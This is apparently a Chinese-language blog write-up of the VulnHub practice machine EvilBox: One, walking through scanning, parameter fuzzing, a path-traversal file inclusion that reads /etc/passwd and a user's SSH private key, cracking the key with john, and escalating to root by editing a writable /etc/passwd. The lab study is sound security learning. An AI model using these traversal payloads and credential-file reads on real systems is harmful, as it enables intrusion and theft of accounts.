vulnhub靶机EvilBox---One

靶机地址:EvilBox: One ~ VulnHub

主机发现

arp-scan -l

vulnhub靶机EvilBox---One_第1张图片

端口扫描

nmap --min-rate 10000 -p- 192.168.21.153

vulnhub靶机EvilBox---One_第2张图片

扫描端口信息

nmap -sV -sT -O -p22,80 192.168.21.153

vulnhub靶机EvilBox---One_第3张图片

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.153

vulnhub靶机EvilBox---One_第4张图片

访问网站

vulnhub靶机EvilBox---One_第5张图片

再去看看robots.txt

vulnhub靶机EvilBox---One_第6张图片

之前扫描到的/secret/去看一下

vulnhub靶机EvilBox---One_第7张图片

扫描网站目录

vulnhub靶机EvilBox---One_第8张图片

访问之后发现全白

vulnhub靶机EvilBox---One_第9张图片

什么都没有,接着扫漏洞

利用nikto进行漏洞扫描

nikto -host 192.168.21.153

vulnhub靶机EvilBox---One_第10张图片

敏感目录

nikto -host http://192.168.21.153/dvwa

vulnhub靶机EvilBox---One_第11张图片

正常的但是发现了一点点不对劲的位置

vulnhub靶机EvilBox---One_第12张图片

这里我用nc拿到数据包的时候发现这里有返回值且不是我最开始访问的时候的白色,这里一定有一个参数接受我的变量,直接抓包看变量名

ffuf -w /root/Desktop/list -u http://192.168.21.153/secret/evil.php?FUZZ=../robots.txt -fs 0

vulnhub靶机EvilBox---One_第13张图片

查看一下这里是否有文件包含

192.168.21.153/secret/evil.php?command=/../../etc/passwd

vulnhub靶机EvilBox---One_第14张图片

确认有这个漏洞

发现新用户

mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

想直接找到ssh密钥文件能直接登入

192.168.21.153/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa

只能hash碰撞

vulnhub靶机EvilBox---One_第15张图片

Rsa密钥拿到,下载下来进行hash碰撞

vulnhub靶机EvilBox---One_第16张图片

修改权限

Chmodd 600 hash(只能是600的权限)

python3 ssh2john.py /root/Desktop/hash > /root/Desktop/idrsa

vulnhub靶机EvilBox---One_第17张图片

john idrsa --wordlist=/usr/share/wordlists/rockyou.txt

vulnhub靶机EvilBox---One_第18张图片

登入mowree账户

ssh [email protected] -i idrsa

vulnhub靶机EvilBox---One_第19张图片

信息收集

想着去找漏洞但是没有找到

只能换方式

find / -user root -perm 2 >/dev/null

这个页面欸有找到

只能去看看passwd有没有权限

先生成一个密码(我用的himobrine)

vulnhub靶机EvilBox---One_第20张图片

修改root密码进行登入

vulnhub靶机EvilBox---One_第21张图片

(登入之后才查看的密码,当时忘记截图了)

查看flag

结束

你可能感兴趣的:(vulnhub,网络安全,web安全,网络攻击模型,系统安全)